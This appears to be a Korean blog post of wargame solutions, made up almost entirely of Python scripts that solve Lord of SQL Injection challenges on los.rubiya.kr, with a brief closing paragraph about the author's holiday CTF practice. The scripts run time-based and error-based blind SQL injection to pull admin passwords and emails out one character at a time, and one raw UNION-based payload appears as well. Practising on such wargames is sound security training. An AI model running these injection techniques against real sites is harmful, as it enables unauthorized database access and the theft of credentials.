'Wargame'에 해당되는 글 454건

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"
    params = {'joinmail':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    end = time.time()
    return end-start

length = 0
for i in range(0,100):
    payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
    if request(payload) > 1:
        length = i
        break

print "Find Admin Email Length[*] = " + str(length)

admin_email = ""
for i in range(1,length+1):
    binary = ""
    for j in range(1,9):
        payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
        if request(payload) > 1:
            binary += "1"
        else:
            binary += "0"
    if binary != "00000000":
        admin_email += chr(int(binary,2))

print "Find Admin Email[*] = " + str(admin_email)

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
    params = {'pw':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    if "config.php" in response.text:
        return True
    else:
        return False

strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""
for i in range(1,100):
    for j in range(0,len(strings)):
        payload = "' or id='admin' and case when pw like '"+admin_pw+strings[j]+"%' then 1 else 9e300*9e300 end-- x "
        if request(payload) == True:
            admin_pw += strings[j]
            break
    if j == len(strings)-1:
        break
print "Find Admin Pw[*] = " + admin_pw

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
    params = {'id':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    end = time.time()
    return end-start

length = 0
for i in range(0,100):
    payload = "' or id='admin' and if(length(pw)="+str(i)+",sleep(3),1)-- x"
    if request(payload) > 2.8:
        length = i
        break

print "Find Admin Pw Length[*] = " + str(length)

admin_pw = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "' or id='admin' and if(ascii(substring(pw,"+str(i)+",1))="+str(j)+",sleep(3),1)-- x"
        if request(payload) > 2.8:
            admin_pw += chr(j)
            break
print "Find Admin Pw[*] = " + admin_pw

import requests

def request(payload_1,payload_2):
    url = "http://los.rubiya.kr/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
    params = {'id':payload_1,'no':payload_2}
    headers = {'Cookie':'PHPSESSID=fnlt2l775q0o8folhtjp84pqg5'}
    response = requests.get(url,params=params,headers=headers)
    if "Hello admin" in response.text:
        return True
    else:
        return False

payload_1 = "'||pw>#"
payload_2 = "\n0x"
for j in range(0,100):
    for i in range(32,128):
        if request(payload_1,payload_2+hex(i).replace("0x","")) == False:
            payload_2 += hex(i-1).replace("0x","")
            break
    if i == 127:
        break

pw = hex(int(payload_2,16)+1)
print "Find Pw[*] = " + pw[2:len(pw)-1].decode("hex").lower()

payload

id=\&pw= union select 0x5c,0x20756e696f6e2073656c6563742030783631363436643639366523#

import requests

def request(payload):
    url = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
    params = {'order':payload}
    headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    response = requests.get(url,params=params,headers=headers)
    if "h>email</th><th>score</th><tr><td>admin</td" in response.text:
        return True
    else:
        return False

length = 0
for i in range(0,100):
    payload = "if(score=50 and length(email)="+str(i)+",score,999)"
    if request(payload) == True:
        length = i

print "Find Admin Email Length[*] = " + str(length)

admin_email = ""
for i in range(1,length+1):
    binary = ""
    for j in range(1,9):
        payload = "if(score=50 and substring(lpad(bin(ord(substring(email,"+str(i)+",1))),8,0),"+str(j)+",1)=1,score,999)"
        if request(payload) == True:
            binary += "1"
        else:
            binary += "0"
    if binary != "00000000":
        admin_email += chr(int(binary,2))

print "Find Admin Email[*] = " + str(admin_email)

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"
    params = {'order':payload}
    headers = {'Cookie':'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    response = requests.get(url,params=params,headers=headers)
    end = time.time()
    return end-start

length = 0
for i in range(0,40):
    payload = "if(score=200 and length(email)="+str(i)+",sleep(1),1)"
    if request(payload) > 1:
        length = i

print "Find Admin Email Length[*] = " + str(length)

admin_email = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "if(score=200 and ascii(substring(email,"+str(i)+",1))="+str(j)+",sleep(1),1)"
        if request(payload) > 1:
            admin_email += chr(j)
            break
print "Find Admin Email[*] = " + str(admin_email)

연휴 때 시간도 남고 D-CTF에서 문제들 풀다가 머리가 너무 아파서 요즘 포렌식이랑, MISC분야도 관심도 생겼겠다 엄청 예전에 웹부분만 봤던 사이트가 생각나서 오랜만에 풀었는데 문제가 생각보다 잘풀려서 시간가는줄 모르고 풀었다. 약간 침해대응 류의 포렌식 4문제 남았는데 이런류 문제는 첨 풀어보는거라 뭔가 재밌을 것 같다.